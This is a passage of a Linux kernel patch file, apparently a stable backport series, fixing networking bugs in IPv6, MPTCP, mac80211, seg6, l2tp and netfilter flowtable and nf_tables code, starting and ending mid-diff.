++	if (sk_hashed(sk)) {
++		spinlock_t *lock = inet_ehash_lockp(hinfo, sk->sk_hash);
++
++		sock_prot_inuse_add(net, sk->sk_prot, -1);
++
++		spin_lock(lock);
++		sk_nulls_del_node_init_rcu(sk);
++		spin_unlock(lock);
++
++		sk->sk_hash = 0;
++		inet_sk(sk)->inet_sport = 0;
++		inet_sk(sk)->inet_num = 0;
++
++		if (tw)
++			inet_twsk_bind_unhash(tw, hinfo);
++	}
++
+ 	spin_unlock(&head2->lock);
+ 	if (tb_created)
+ 		inet_bind_bucket_destroy(hinfo->bind_bucket_cachep, tb);
+-	spin_unlock_bh(&head->lock);
++	spin_unlock(&head->lock);
++
++	if (tw)
++		inet_twsk_deschedule_put(tw);
++
++	local_bh_enable();
++
+ 	return -ENOMEM;
+ }
+ 
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index b8dc20fe7a4e2..46527b5cc8f0c 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -706,6 +706,22 @@ static int inet6_netconf_get_devconf(struct sk_buff *in_skb,
+ 	return err;
+ }
+ 
++/* Combine dev_addr_genid and dev_base_seq to detect changes.
++ */
++static u32 inet6_base_seq(const struct net *net)
++{
++	u32 res = atomic_read(&net->ipv6.dev_addr_genid) +
++		  net->dev_base_seq;
++
++	/* Must not return 0 (see nl_dump_check_consistent()).
++	 * Chose a value far away from 0.
++	 */
++	if (!res)
++		res = 0x80000000;
++	return res;
++}
++
++
+ static int inet6_netconf_dump_devconf(struct sk_buff *skb,
+ 				      struct netlink_callback *cb)
+ {
+@@ -739,8 +755,7 @@ static int inet6_netconf_dump_devconf(struct sk_buff *skb,
+ 		idx = 0;
+ 		head = &net->dev_index_head[h];
+ 		rcu_read_lock();
+-		cb->seq = atomic_read(&net->ipv6.dev_addr_genid) ^
+-			  net->dev_base_seq;
++		cb->seq = inet6_base_seq(net);
+ 		hlist_for_each_entry_rcu(dev, head, index_hlist) {
+ 			if (idx < s_idx)
+ 				goto cont;
+@@ -5326,7 +5341,7 @@ static int inet6_dump_addr(struct sk_buff *skb, struct netlink_callback *cb,
+ 	}
+ 
+ 	rcu_read_lock();
+-	cb->seq = atomic_read(&tgt_net->ipv6.dev_addr_genid) ^ tgt_net->dev_base_seq;
++	cb->seq = inet6_base_seq(tgt_net);
+ 	for (h = s_h; h < NETDEV_HASHENTRIES; h++, s_idx = 0) {
+ 		idx = 0;
+ 		head = &tgt_net->dev_index_head[h];
+diff --git a/net/ipv6/exthdrs.c b/net/ipv6/exthdrs.c
+index 5fa0e37305d9d..1cfdd9d950123 100644
+--- a/net/ipv6/exthdrs.c
++++ b/net/ipv6/exthdrs.c
+@@ -180,6 +180,8 @@ static bool ip6_parse_tlv(bool hopbyhop,
+ 				case IPV6_TLV_IOAM:
+ 					if (!ipv6_hop_ioam(skb, off))
+ 						return false;
++
++					nh = skb_network_header(skb);
+ 					break;
+ 				case IPV6_TLV_JUMBO:
+ 					if (!ipv6_hop_jumbo(skb, off))
+@@ -974,6 +976,14 @@ static bool ipv6_hop_ioam(struct sk_buff *skb, int optoff)
+ 		if (!skb_valid_dst(skb))
+ 			ip6_route_input(skb);
+ 
++		/* About to mangle packet header */
++		if (skb_ensure_writable(skb, optoff + 2 + hdr->opt_len))
++			goto drop;
++
++		/* Trace pointer may have changed */
++		trace = (struct ioam6_trace_hdr *)(skb_network_header(skb)
++						   + optoff + sizeof(*hdr));
++
+ 		ioam6_fill_trace_data(skb, ns, trace, true);
+ 		break;
+ 	default:
+diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
+index 29346a6eec9ff..35508abd76f43 100644
+--- a/net/ipv6/seg6.c
++++ b/net/ipv6/seg6.c
+@@ -512,22 +512,24 @@ int __init seg6_init(void)
+ {
+ 	int err;
+ 
+-	err = genl_register_family(&seg6_genl_family);
++	err = register_pernet_subsys(&ip6_segments_ops);
+ 	if (err)
+ 		goto out;
+ 
+-	err = register_pernet_subsys(&ip6_segments_ops);
++	err = genl_register_family(&seg6_genl_family);
+ 	if (err)
+-		goto out_unregister_genl;
++		goto out_unregister_pernet;
+ 
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
+ 	err = seg6_iptunnel_init();
+ 	if (err)
+-		goto out_unregister_pernet;
++		goto out_unregister_genl;
+ 
+ 	err = seg6_local_init();
+-	if (err)
+-		goto out_unregister_pernet;
++	if (err) {
++		seg6_iptunnel_exit();
++		goto out_unregister_genl;
++	}
+ #endif
+ 
+ #ifdef CONFIG_IPV6_SEG6_HMAC
+@@ -548,11 +550,11 @@ int __init seg6_init(void)
+ #endif
+ #endif
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
+-out_unregister_pernet:
+-	unregister_pernet_subsys(&ip6_segments_ops);
+-#endif
+ out_unregister_genl:
+ 	genl_unregister_family(&seg6_genl_family);
++#endif
++out_unregister_pernet:
++	unregister_pernet_subsys(&ip6_segments_ops);
+ 	goto out;
+ }
+ 
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 314ec3a51e8de..bb92dc8b82f39 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -630,7 +630,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ back_from_confirm:
+ 	lock_sock(sk);
+-	ulen = len + skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0;
++	ulen = len + (skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0);
+ 	err = ip6_append_data(sk, ip_generic_getfrag, msg,
+ 			      ulen, transhdrlen, &ipc6,
+ 			      &fl6, (struct rt6_info *)dst,
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index a2c4866080bd7..6cf0b77839d1d 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1775,6 +1775,8 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 					      sband->band);
+ 	}
+ 
++	ieee80211_sta_set_rx_nss(link_sta);
++
+ 	return ret;
+ }
+ 
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index c6f0da028a2a4..f25dc6931a5b1 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -7294,6 +7294,7 @@ int ieee80211_mgd_deauth(struct ieee80211_sub_if_data *sdata,
+ 		ieee80211_report_disconnect(sdata, frame_buf,
+ 					    sizeof(frame_buf), true,
+ 					    req->reason_code, false);
++		drv_mgd_complete_tx(sdata->local, sdata, &info);
+ 		return 0;
+ 	}
+ 
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index f3d6c3e4c970e..bd56015b29258 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -891,6 +891,8 @@ static int sta_info_insert_finish(struct sta_info *sta) __acquires(RCU)
+ 	if (ieee80211_vif_is_mesh(&sdata->vif))
+ 		mesh_accept_plinks_update(sdata);
+ 
++	ieee80211_check_fast_xmit(sta);
++
+ 	return 0;
+  out_remove:
+ 	if (sta->sta.valid_links)
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 322a035f75929..3d62e8b718740 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -3044,7 +3044,7 @@ void ieee80211_check_fast_xmit(struct sta_info *sta)
+ 	    sdata->vif.type == NL80211_IFTYPE_STATION)
+ 		goto out;
+ 
+-	if (!test_sta_flag(sta, WLAN_STA_AUTHORIZED))
++	if (!test_sta_flag(sta, WLAN_STA_AUTHORIZED) || !sta->uploaded)
+ 		goto out;
+ 
+ 	if (test_sta_flag(sta, WLAN_STA_PS_STA) ||
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index 68be8f2b622dd..256bf0b89e6ca 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -663,7 +663,7 @@ struct mctp_sk_key *mctp_alloc_local_tag(struct mctp_sock *msk,
+ 	spin_unlock_irqrestore(&mns->keys_lock, flags);
+ 
+ 	if (!tagbits) {
+-		kfree(key);
++		mctp_key_unref(key);
+ 		return ERR_PTR(-EBUSY);
+ 	}
+ 
+diff --git a/net/mptcp/diag.c b/net/mptcp/diag.c
+index a536586742f28..e57c5f47f0351 100644
+--- a/net/mptcp/diag.c
++++ b/net/mptcp/diag.c
+@@ -13,17 +13,19 @@
+ #include <uapi/linux/mptcp.h>
+ #include "protocol.h"
+ 
+-static int subflow_get_info(const struct sock *sk, struct sk_buff *skb)
++static int subflow_get_info(struct sock *sk, struct sk_buff *skb)
+ {
+ 	struct mptcp_subflow_context *sf;
+ 	struct nlattr *start;
+ 	u32 flags = 0;
++	bool slow;
+ 	int err;
+ 
+ 	start = nla_nest_start_noflag(skb, INET_ULP_INFO_MPTCP);
+ 	if (!start)
+ 		return -EMSGSIZE;
+ 
++	slow = lock_sock_fast(sk);
+ 	rcu_read_lock();
+ 	sf = rcu_dereference(inet_csk(sk)->icsk_ulp_data);
+ 	if (!sf) {
+@@ -69,11 +71,13 @@ static int subflow_get_info(const struct sock *sk, struct sk_buff *skb)
+ 	}
+ 
+ 	rcu_read_unlock();
++	unlock_sock_fast(sk, slow);
+ 	nla_nest_end(skb, start);
+ 	return 0;
+ 
+ nla_failure:
+ 	rcu_read_unlock();
++	unlock_sock_fast(sk, slow);
+ 	nla_nest_cancel(skb, start);
+ 	return err;
+ }
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 980050f6b456f..70a1025f093cf 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -900,7 +900,8 @@ static void __mptcp_pm_release_addr_entry(struct mptcp_pm_addr_entry *entry)
+ }
+ 
+ static int mptcp_pm_nl_append_new_local_addr(struct pm_nl_pernet *pernet,
+-					     struct mptcp_pm_addr_entry *entry)
++					     struct mptcp_pm_addr_entry *entry,
++					     bool needs_id)
+ {
+ 	struct mptcp_pm_addr_entry *cur, *del_entry = NULL;
+ 	unsigned int addr_max;
+@@ -942,7 +943,7 @@ static int mptcp_pm_nl_append_new_local_addr(struct pm_nl_pernet *pernet,
+ 		}
+ 	}
+ 
+-	if (!entry->addr.id) {
++	if (!entry->addr.id && needs_id) {
+ find_next:
+ 		entry->addr.id = find_next_zero_bit(pernet->id_bitmap,
+ 						    MPTCP_PM_MAX_ADDR_ID + 1,
+@@ -953,7 +954,7 @@ static int mptcp_pm_nl_append_new_local_addr(struct pm_nl_pernet *pernet,
+ 		}
+ 	}
+ 
+-	if (!entry->addr.id)
++	if (!entry->addr.id && needs_id)
+ 		goto out;
+ 
+ 	__set_bit(entry->addr.id, pernet->id_bitmap);
+@@ -1095,7 +1096,7 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	entry->ifindex = 0;
+ 	entry->flags = MPTCP_PM_ADDR_FLAG_IMPLICIT;
+ 	entry->lsk = NULL;
+-	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry);
++	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry, true);
+ 	if (ret < 0)
+ 		kfree(entry);
+ 
+@@ -1311,6 +1312,18 @@ static int mptcp_nl_add_subflow_or_signal_addr(struct net *net)
+ 	return 0;
+ }
+ 
++static bool mptcp_pm_has_addr_attr_id(const struct nlattr *attr,
++				      struct genl_info *info)
++{
++	struct nlattr *tb[MPTCP_PM_ADDR_ATTR_MAX + 1];
++
++	if (!nla_parse_nested_deprecated(tb, MPTCP_PM_ADDR_ATTR_MAX, attr,
++					 mptcp_pm_addr_policy, info->extack) &&
++	    tb[MPTCP_PM_ADDR_ATTR_ID])
++		return true;
++	return false;
++}
++
+ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	struct nlattr *attr = info->attrs[MPTCP_PM_ATTR_ADDR];
+@@ -1352,7 +1365,8 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 			goto out_free;
+ 		}
+ 	}
+-	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry);
++	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry,
++						!mptcp_pm_has_addr_attr_id(attr, info));
+ 	if (ret < 0) {
+ 		GENL_SET_ERR_MSG(info, "too many addresses or duplicate one");
+ 		goto out_free;
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 2e1e0d0e3ec60..631fa104617c3 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -25,8 +25,9 @@ void mptcp_free_local_addr_list(struct mptcp_sock *msk)
+ 	}
+ }
+ 
+-int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+-					     struct mptcp_pm_addr_entry *entry)
++static int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
++						    struct mptcp_pm_addr_entry *entry,
++						    bool needs_id)
+ {
+ 	DECLARE_BITMAP(id_bitmap, MPTCP_PM_MAX_ADDR_ID + 1);
+ 	struct mptcp_pm_addr_entry *match = NULL;
+@@ -41,7 +42,7 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 	spin_lock_bh(&msk->pm.lock);
+ 	list_for_each_entry(e, &msk->pm.userspace_pm_local_addr_list, list) {
+ 		addr_match = mptcp_addresses_equal(&e->addr, &entry->addr, true);
+-		if (addr_match && entry->addr.id == 0)
++		if (addr_match && entry->addr.id == 0 && needs_id)
+ 			entry->addr.id = e->addr.id;
+ 		id_match = (e->addr.id == entry->addr.id);
+ 		if (addr_match && id_match) {
+@@ -64,7 +65,7 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 		}
+ 
+ 		*e = *entry;
+-		if (!e->addr.id)
++		if (!e->addr.id && needs_id)
+ 			e->addr.id = find_next_zero_bit(id_bitmap,
+ 							MPTCP_PM_MAX_ADDR_ID + 1,
+ 							1);
+@@ -155,7 +156,7 @@ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk,
+ 	if (new_entry.addr.port == msk_sport)
+ 		new_entry.addr.port = 0;
+ 
+-	return mptcp_userspace_pm_append_new_local_addr(msk, &new_entry);
++	return mptcp_userspace_pm_append_new_local_addr(msk, &new_entry, true);
+ }
+ 
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+@@ -197,7 +198,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 		goto announce_err;
+ 	}
+ 
+-	err = mptcp_userspace_pm_append_new_local_addr(msk, &addr_val);
++	err = mptcp_userspace_pm_append_new_local_addr(msk, &addr_val, false);
+ 	if (err < 0) {
+ 		GENL_SET_ERR_MSG(info, "did not match address and id");
+ 		goto announce_err;
+@@ -221,6 +222,40 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 	return err;
+ }
+ 
++static int mptcp_userspace_pm_remove_id_zero_address(struct mptcp_sock *msk,
++						     struct genl_info *info)
++{
++	struct mptcp_rm_list list = { .nr = 0 };
++	struct mptcp_subflow_context *subflow;
++	struct sock *sk = (struct sock *)msk;
++	bool has_id_0 = false;
++	int err = -EINVAL;
++
++	lock_sock(sk);
++	mptcp_for_each_subflow(msk, subflow) {
++		if (subflow->local_id == 0) {
++			has_id_0 = true;
++			break;
++		}
++	}
++	if (!has_id_0) {
++		GENL_SET_ERR_MSG(info, "address with id 0 not found");
++		goto remove_err;
++	}
++
++	list.ids[list.nr++] = 0;
++
++	spin_lock_bh(&msk->pm.lock);
++	mptcp_pm_remove_addr(msk, &list);
++	spin_unlock_bh(&msk->pm.lock);
++
++	err = 0;
++
++remove_err:
++	release_sock(sk);
++	return err;
++}
++
+ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	struct nlattr *token = info->attrs[MPTCP_PM_ATTR_TOKEN];
+@@ -252,6 +287,11 @@ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info)
+ 		goto remove_err;
+ 	}
+ 
++	if (id_val == 0) {
++		err = mptcp_userspace_pm_remove_id_zero_address(msk, info);
++		goto remove_err;
++	}
++
+ 	lock_sock((struct sock *)msk);
+ 
+ 	list_for_each_entry(entry, &msk->pm.userspace_pm_local_addr_list, list) {
+@@ -335,7 +375,7 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	local.addr = addr_l;
+-	err = mptcp_userspace_pm_append_new_local_addr(msk, &local);
++	err = mptcp_userspace_pm_append_new_local_addr(msk, &local, false);
+ 	if (err < 0) {
+ 		GENL_SET_ERR_MSG(info, "did not match address and id");
+ 		goto create_err;
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 259672cc344f3..b092205213234 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -834,8 +834,6 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list);
+ 
+-int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+-					     struct mptcp_pm_addr_entry *entry);
+ void mptcp_free_local_addr_list(struct mptcp_sock *msk);
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info);
+ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info);
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index c94a9971d790c..7ffd698497f2a 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -299,7 +299,7 @@ sctp_new(struct nf_conn *ct, const struct sk_buff *skb,
+ 			pr_debug("Setting vtag %x for secondary conntrack\n",
+ 				 sh->vtag);
+ 			ct->proto.sctp.vtag[IP_CT_DIR_ORIGINAL] = sh->vtag;
+-		} else {
++		} else if (sch->type == SCTP_CID_SHUTDOWN_ACK) {
+ 		/* If it is a shutdown ack OOTB packet, we expect a return
+ 		   shutdown complete, otherwise an ABORT Sec 8.4 (5) and (8) */
+ 			pr_debug("Setting vtag %x for new conn OOTB\n",
+diff --git a/net/netfilter/nf_flow_table_core.c b/net/netfilter/nf_flow_table_core.c
+index c1d99cb370b44..99195cf6b2657 100644
+--- a/net/netfilter/nf_flow_table_core.c
++++ b/net/netfilter/nf_flow_table_core.c
+@@ -87,12 +87,22 @@ static u32 flow_offload_dst_cookie(struct flow_offload_tuple *flow_tuple)
+ 	return 0;
+ }
+ 
++static struct dst_entry *nft_route_dst_fetch(struct nf_flow_route *route,
++					     enum flow_offload_tuple_dir dir)
++{
++	struct dst_entry *dst = route->tuple[dir].dst;
++
++	route->tuple[dir].dst = NULL;
++
++	return dst;
++}
++
+ static int flow_offload_fill_route(struct flow_offload *flow,
+-				   const struct nf_flow_route *route,
++				   struct nf_flow_route *route,
+ 				   enum flow_offload_tuple_dir dir)
+ {
+ 	struct flow_offload_tuple *flow_tuple = &flow->tuplehash[dir].tuple;
+-	struct dst_entry *dst = route->tuple[dir].dst;
++	struct dst_entry *dst = nft_route_dst_fetch(route, dir);
+ 	int i, j = 0;
+ 
+ 	switch (flow_tuple->l3proto) {
+@@ -122,12 +132,10 @@ static int flow_offload_fill_route(struct flow_offload *flow,
+ 		       ETH_ALEN);
+ 		flow_tuple->out.ifidx = route->tuple[dir].out.ifindex;
+ 		flow_tuple->out.hw_ifidx = route->tuple[dir].out.hw_ifindex;
++		dst_release(dst);
+ 		break;
+ 	case FLOW_OFFLOAD_XMIT_XFRM:
+ 	case FLOW_OFFLOAD_XMIT_NEIGH:
+-		if (!dst_hold_safe(route->tuple[dir].dst))
+-			return -1;
+-
+ 		flow_tuple->dst_cache = dst;
+ 		flow_tuple->dst_cookie = flow_offload_dst_cookie(flow_tuple);
+ 		break;
+@@ -148,27 +156,12 @@ static void nft_flow_dst_release(struct flow_offload *flow,
+ 		dst_release(flow->tuplehash[dir].tuple.dst_cache);
+ }
+ 
+-int flow_offload_route_init(struct flow_offload *flow,
+-			    const struct nf_flow_route *route)
++void flow_offload_route_init(struct flow_offload *flow,
++			     struct nf_flow_route *route)
+ {
+-	int err;
+-
+-	err = flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_ORIGINAL);
+-	if (err < 0)
+-		return err;
+-
+-	err = flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_REPLY);
+-	if (err < 0)
+-		goto err_route_reply;
+-
++	flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_ORIGINAL);
++	flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_REPLY);
+ 	flow->type = NF_FLOW_OFFLOAD_ROUTE;
+-
+-	return 0;
+-
+-err_route_reply:
+-	nft_flow_dst_release(flow, FLOW_OFFLOAD_DIR_ORIGINAL);
+-
+-	return err;
+ }
+ EXPORT_SYMBOL_GPL(flow_offload_route_init);
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 49acb89ba9c56..e21ec3ad80939 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -686,15 +686,16 @@ static int nft_delobj(struct nft_ctx *ctx, struct nft_object *obj)
+ 	return err;
+ }
+ 
+-static int nft_trans_flowtable_add(struct nft_ctx *ctx, int msg_type,
+-				   struct nft_flowtable *flowtable)
++static struct nft_trans *
++nft_trans_flowtable_add(struct nft_ctx *ctx, int msg_type,
++		        struct nft_flowtable *flowtable)
+ {
+ 	struct nft_trans *trans;
+ 
+ 	trans = nft_trans_alloc(ctx, msg_type,
+ 				sizeof(struct nft_trans_flowtable));
+ 	if (trans == NULL)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	if (msg_type == NFT_MSG_NEWFLOWTABLE)
+ 		nft_activate_next(ctx->net, flowtable);
+@@ -703,22 +704,22 @@ static int nft_trans_flowtable_add(struct nft_ctx *ctx, int msg_type,
+ 	nft_trans_flowtable(trans) = flowtable;
+ 	nft_trans_commit_list_add_tail(ctx->net, trans);
+ 
+-	return 0;
++	return trans;
+ }
+ 
+ static int nft_delflowtable(struct nft_ctx *ctx,
+ 			    struct nft_flowtable *flowtable)
+ {
+-	int err;
++	struct nft_trans *trans;
+ 
+-	err = nft_trans_flowtable_add(ctx, NFT_MSG_DELFLOWTABLE, flowtable);
+-	if (err < 0)
+-		return err;
++	trans = nft_trans_flowtable_add(ctx, NFT_MSG_DELFLOWTABLE, flowtable);
++	if (IS_ERR(trans))
++		return PTR_ERR(trans);
+ 
+ 	nft_deactivate_next(ctx->net, flowtable);
+ 	nft_use_dec(&ctx->table->use);
+ 
+-	return err;
++	return 0;
+ }
+ 
+ static void __nft_reg_track_clobber(struct nft_regs_track *track, u8 dreg)
+@@ -1245,6 +1246,7 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 	return 0;
+ 
+ err_register_hooks:
++	ctx->table->flags |= NFT_TABLE_F_DORMANT;
+ 	nft_trans_destroy(trans);
+ 	return ret;
+ }
+@@ -2057,7 +2059,7 @@ static struct nft_hook *nft_netdev_hook_alloc(struct net *net,
+ 	struct nft_hook *hook;
+ 	int err;
+ 
+-	hook = kmalloc(sizeof(struct nft_hook), GFP_KERNEL_ACCOUNT);
++	hook = kzalloc(sizeof(struct nft_hook), GFP_KERNEL_ACCOUNT);
+ 	if (!hook) {
+ 		err = -ENOMEM;
+ 		goto err_hook_alloc;
+@@ -2458,19 +2460,15 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 	RCU_INIT_POINTER(chain->blob_gen_0, blob);
+ 	RCU_INIT_POINTER(chain->blob_gen_1, blob);
+ 
+-	err = nf_tables_register_hook(net, table, chain);
+-	if (err < 0)
+-		goto err_destroy_chain;
+-
+ 	if (!nft_use_inc(&table->use)) {
+ 		err = -EMFILE;
+-		goto err_use;
++		goto err_destroy_chain;
+ 	}
+ 
+ 	trans = nft_trans_chain_add(ctx, NFT_MSG_NEWCHAIN);
+ 	if (IS_ERR(trans)) {
+ 		err = PTR_ERR(trans);
+-		goto err_unregister_hook;
++		goto err_trans;
+ 	}
+ 
+ 	nft_trans_chain_policy(trans) = NFT_CHAIN_POLICY_UNSET;
+@@ -2478,17 +2476,22 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 		nft_trans_chain_policy(trans) = policy;
+ 
+ 	err = nft_chain_add(table, chain);
+-	if (err < 0) {
+-		nft_trans_destroy(trans);
+-		goto err_unregister_hook;
+-	}
++	if (err < 0)
++		goto err_chain_add;
++
++	/* This must be LAST to ensure no packets are walking over this chain. */
++	err = nf_tables_register_hook(net, table, chain);
++	if (err < 0)
++		goto err_register_hook;
+ 
+ 	return 0;
+ 
+-err_unregister_hook:
++err_register_hook:
++	nft_chain_del(chain);
++err_chain_add:
++	nft_trans_destroy(trans);
++err_trans:
+ 	nft_use_dec_restore(&table->use);
+-err_use:
+-	nf_tables_unregister_hook(net, table, chain);
+ err_destroy_chain:
+ 	nf_tables_chain_destroy(ctx);
+ 
+@@ -7937,7 +7940,7 @@ static int nft_register_flowtable_net_hooks(struct net *net,
+ 	return err;
+ }
+ 
+-static void nft_flowtable_hooks_destroy(struct list_head *hook_list)
++static void nft_hooks_destroy(struct list_head *hook_list)
+ {
+ 	struct nft_hook *hook, *next;
+ 
+@@ -8030,9 +8033,9 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 	u8 family = info->nfmsg->nfgen_family;
+ 	const struct nf_flowtable_type *type;
+ 	struct nft_flowtable *flowtable;
+-	struct nft_hook *hook, *next;
+ 	struct net *net = info->net;
+ 	struct nft_table *table;
++	struct nft_trans *trans;
+ 	struct nft_ctx ctx;
+ 	int err;
+ 
+@@ -8112,34 +8115,34 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 	err = nft_flowtable_parse_hook(&ctx, nla[NFTA_FLOWTABLE_HOOK],
+ 				       &flowtable_hook, flowtable, true);
+ 	if (err < 0)
+-		goto err4;
++		goto err_flowtable_parse_hooks;
+ 
+ 	list_splice(&flowtable_hook.list, &flowtable->hook_list);
+ 	flowtable->data.priority = flowtable_hook.priority;
+ 	flowtable->hooknum = flowtable_hook.num;
+ 
++	trans = nft_trans_flowtable_add(&ctx, NFT_MSG_NEWFLOWTABLE, flowtable);
++	if (IS_ERR(trans)) {
++		err = PTR_ERR(trans);
++		goto err_flowtable_trans;
++	}
++
++	/* This must be LAST to ensure no packets are walking over this flowtable. */
+ 	err = nft_register_flowtable_net_hooks(ctx.net, table,
+ 					       &flowtable->hook_list,
+ 					       flowtable);
+-	if (err < 0) {
+-		nft_flowtable_hooks_destroy(&flowtable->hook_list);
+-		goto err4;
+-	}
+-
+-	err = nft_trans_flowtable_add(&ctx, NFT_MSG_NEWFLOWTABLE, flowtable);
+ 	if (err < 0)
+-		goto err5;
++		goto err_flowtable_hooks;
+ 
+ 	list_add_tail_rcu(&flowtable->list, &table->flowtables);
+ 
+ 	return 0;
+-err5:
+-	list_for_each_entry_safe(hook, next, &flowtable->hook_list, list) {
+-		nft_unregister_flowtable_hook(net, flowtable, hook);
+-		list_del_rcu(&hook->list);
+-		kfree_rcu(hook, rcu);
+-	}
+-err4:
++
++err_flowtable_hooks:
++	nft_trans_destroy(trans);
++err_flowtable_trans:
++	nft_hooks_destroy(&flowtable->hook_list);
++err_flowtable_parse_hooks:
+ 	flowtable->data.type->free(&flowtable->data);
+ err3:
+ 	module_put(type->owner);
+@@ -8892,7 +8895,7 @@ static void nft_commit_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_DELFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+@@ -9849,7 +9852,7 @@ static void nf_tables_abort_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_NEWFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+diff --git a/net/netfilter/nft_flow_offload.c b/net/netfilter/nft_flow_offload.c
+index 3d9f6dda5aeb2..7a8707632a815 100644
+--- a/net/netfilter/nft_flow_offload.c
++++ b/net/netfilter/nft_flow_offload.c
+@@ -250,9 +250,14 @@ static int nft_flow_route(const struct nft_pktinfo *pkt,
+ 		break;
+ 	}
+ 
++	if (!dst_hold_safe(this_dst))
++		return -ENOENT;
++
+ 	nf_route(nft_net(pkt), &other_dst, &fl, false, nft_pf(pkt));
+-	if (!other_dst)
++	if (!other_dst) {
++		dst_release(this_dst);
+ 		return -ENOENT;
++	}
+ 
+ 	nft_default_forward_path(route, this_dst, dir);
+ 	nft_default_forward_path(route, other_dst, !dir);
+@@ -349,8 +354,7 @@ static void nft_flow_offload_eval(const struct nft_expr *expr,
+ 	if (!flow)
+ 		goto err_flow_alloc;
+ 
+-	if (flow_offload_route_init(flow, &route) < 0)
+-		goto err_flow_add;
++	flow_offload_route_init(flow, &route);
+ 
+ 	if (tcph) {
